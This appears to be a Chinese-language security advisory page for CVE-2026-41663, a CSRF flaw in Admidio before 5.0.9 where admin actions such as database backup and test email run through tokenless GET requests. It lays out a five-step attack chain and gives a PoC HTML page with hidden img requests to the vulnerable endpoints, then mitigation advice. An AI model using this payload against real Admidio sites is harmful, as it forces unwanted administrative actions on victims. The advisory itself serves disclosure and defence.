IPBUF安全漏洞报告
English
CVE-2026-41663 CVSS 3.5 低危

CVE-2026-41663 Admidio CSRF漏洞

披露日期: 2026-05-07

漏洞信息

漏洞编号
CVE-2026-41663
漏洞类型
CSRF
CVSS评分
3.5 低危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
需要交互 (UI:R)
影响产品
Admidio

相关标签

CSRFAdmidioGET请求权限绕过信息泄露

漏洞概述

Admidio是一款开源的用户管理解决方案。在5.0.9版本之前,其偏好设置模块中的数据库备份、测试邮件发送及htaccess生成等关键管理操作存在安全缺陷。这些操作通过GET请求执行,且未进行CSRF令牌验证。由于Cookie的SameSite属性设置为Lax,导致Cookie会随顶级GET导航传输,攻击者可诱导已认证的管理员访问恶意页面,从而在管理员不知情的情况下触发上述敏感操作。该漏洞在5.0.9版本中已得到修复。

技术细节

该漏洞源于Admidio在处理敏感管理操作时缺乏有效的跨站请求伪造(CSRF)防护机制。具体而言,偏好设置模块中的数据库备份、测试邮件和htaccess生成功能仅通过GET请求触发,且未校验CSRF Token。在现代Web安全机制中,虽然SameSite=Lax属性可以防止大多数跨站POST请求携带Cookie,但它允许在用户发起的顶级导航(如点击链接)中携带Cookie。攻击者利用这一特性,构造恶意链接或包含隐藏iframe的页面,诱导已登录的管理员访问。当管理员触发请求时,浏览器会自动携带认证Cookie,导致服务器执行攻击者预设的管理操作,如下载备份数据或发送测试邮件,进而造成信息泄露或服务干扰。

攻击链分析

STEP 1
步骤1
攻击者分析Admidio源码,发现偏好设置模块的敏感操作(如备份、发邮件)通过无Token验证的GET请求实现。
STEP 2
步骤2
攻击者构造包含恶意GET请求的HTML页面,利用<img>标签或JS自动加载目标URL。
STEP 3
步骤3
攻击者诱导已登录Admidio系统的管理员访问该恶意页面(如发送钓鱼邮件)。
STEP 4
步骤4
管理员浏览器在解析页面时,发起GET请求。由于SameSite=Lax设置,浏览器自动携带Session Cookie发送给服务器。
STEP 5
步骤5
Admidio服务器接收到请求,因缺乏CSRF验证,误认为是管理员合法操作,执行数据库备份等敏感指令,攻击者获取敏感数据或干扰服务。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- Proof of Concept for CVE-2026-41663 --> <!-- Attacker hosts this page and tricks the Admin into visiting it --> <html> <body> <h1>You are being redirected...</h1> <!-- Example: Triggering Database Backup via GET --> <img src="http://target-site.com/adm_program/modules/preferences/preferences_function.php?mode=8" style="display:none;" /> <!-- Example: Triggering Test Email via GET --> <img src="http://target-site.com/adm_program/modules/preferences/preferences_function.php?mode=9" style="display:none;" /> <script> // Alternatively, force navigation using JS // window.location.href = "http://target-site.com/adm_program/modules/preferences/preferences_function.php?mode=8"; </script> </body> </html>

影响范围

Admidio < 5.0.9

防御指南

临时缓解措施
建议立即升级至Admidio 5.0.9版本以彻底修复此漏洞。如无法立即升级,应限制管理员账户的上网行为,避免点击不明链接,并考虑在Web应用防火墙(WAF)中添加规则,拦截针对偏好设置模块的无Referer或无Token的GET请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表